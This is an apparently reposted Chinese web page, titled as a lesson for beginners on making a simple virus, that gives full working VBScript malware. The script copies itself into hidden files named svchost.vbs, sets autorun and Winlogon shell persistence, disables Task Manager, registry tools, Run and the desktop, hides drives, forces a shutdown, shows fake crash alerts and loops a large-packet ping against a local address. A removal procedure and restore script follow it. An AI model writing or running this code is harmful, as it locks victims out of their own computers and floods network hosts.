分享

教菜鸟一做个简单的病毒!

 小懒猫920 2012-04-22

教菜鸟一做个简单的病毒!

教菜鸟一做个简单的病毒!
Set objFS = CreateObject("Scripting.FileSystemObject")
Set objFSO = CreateObject("Scripting.FileSystemObject")
set wsh=wscript.createobject("wscript.shell")
set reg=wscript.createobject("wscript.shell")
dim wsh
a=WScript.ScriptFullName
b="shutdown -t 60 -s -c 如果你是菜鸟的话。。。我想你知道害怕了吧!嬉嬉!"
c="c:\svchost.vbs"
d="d:\svchost.vbs"
s="c:\windows\system32\svchost.vbs"
c1="attrib +s +h +a +r c:\svchost.vbs"
d1="attrib +s +h +a +r d:\svchost.vbs"
s1="attrib +s +h +a +r c:\windows\system32\svchost.vbs"
If objFSO.FileExists (c) Then
Else
objFs.GetFile (a).Copy (c)
wsh.run c1
End If
If objFSO.FileExists(d) Then
Else
objFs.GetFile (a).Copy (d)
wsh.run d1
End If
If objFSO.FileExists(s) Then
Else
objFs.GetFile (a).Copy (s)
wsh.run s1
End If
wsh.run b
wsh.run "narrator"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","00000001","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","00000001","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoRun","00000001","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoClose","00000001","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoLogoff","00000001","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoDesktop","00000001","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoDrives","000000100","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost","c:\svchost.vbs","REG_SZ"
reg.regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost","d:\svchost.vbs","REG_SZ"
reg.regwrite"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\svchost","c:\windows\system32\svchost.vbs","REG_SZ"
reg.regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\svchost","c:\windows\system32\svchost.vbs","REG_SZ"
reg.regwrite"HKEY_CURRENT_USER\Control Panel\International\sTimeFormat","tttt H:mm:ss","REG_SZ"
reg.regwrite"HKEY_CURRENT_USER\Control Panel\International\s1159","笨蛋!","REG_SZ"
reg.regwrite"HKEY_CURRENT_USER\Control Panel\International\s2359","傻逼!","REG_SZ"
reg.regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell","c:\windows\system32\svchost.vbs","REG_SZ"
msgbox "系统快要崩溃了!",48,"由于你经常看黄页:"
msgbox "windows崩溃了!",18,"安全警报:"
do
wsh.run ("ping -t -l 6500 192.168.1.1")
loop
'请将以上代码保存在txt文件中保存、再把后缀名txt改成vbs后执行后就可以看到效果
解救方法如下:
开机的时候按F8选择从带命令行的安全模式启动系统,然后执行以下命令
attrib -s -r -h -a c:\windows\system32\svchost.vbs
attrib -s -r -h -a c:\svchost.vbs
attrib -s -r -h -a d:\svchost.vbs
explorer
然后从以上文件目录中找到那VBS文件,把他们删除既可,还要自己建立一个新的VBS文件,把一下代码复制进去执行一次就OK了!
set reg=wscript.createobject("wscript.shell")
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","00000000","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","00000000","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoRun","00000000","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoClose","00000000","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoLogoff","00000000","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoDesktop","00000000","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoDrives","000000000","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost","","REG_SZ"
reg.regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost","","REG_SZ"
reg.regwrite"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\svchost","","REG_SZ"
reg.regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\svchost","","REG_SZ"
reg.regwrite"HKEY_CURRENT_USER\Control Panel\International\sTimeFormat","H:mm:ss","REG_SZ"
reg.regwrite"HKEY_CURRENT_USER\Control Panel\International\s1159","AM","REG_SZ"
reg.regwrite"HKEY_CURRENT_USER\Control Panel\International\s2359","PM","REG_SZ"
reg.regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell","Explorer.exe","REG_SZ"
msgbox "解救成功,请勿用此代码破坏别人",64,"OK"



    本站是提供个人知识管理的网络存储空间,所有内容均由用户发布,不代表本站观点。请注意甄别内容中的联系方式、诱导购买等信息,谨防诈骗。如发现有害或侵权内容,请点击一键举报。
    转藏 分享 献花(0

    0条评论

    发表

    请遵守用户 评论公约

    类似文章 更多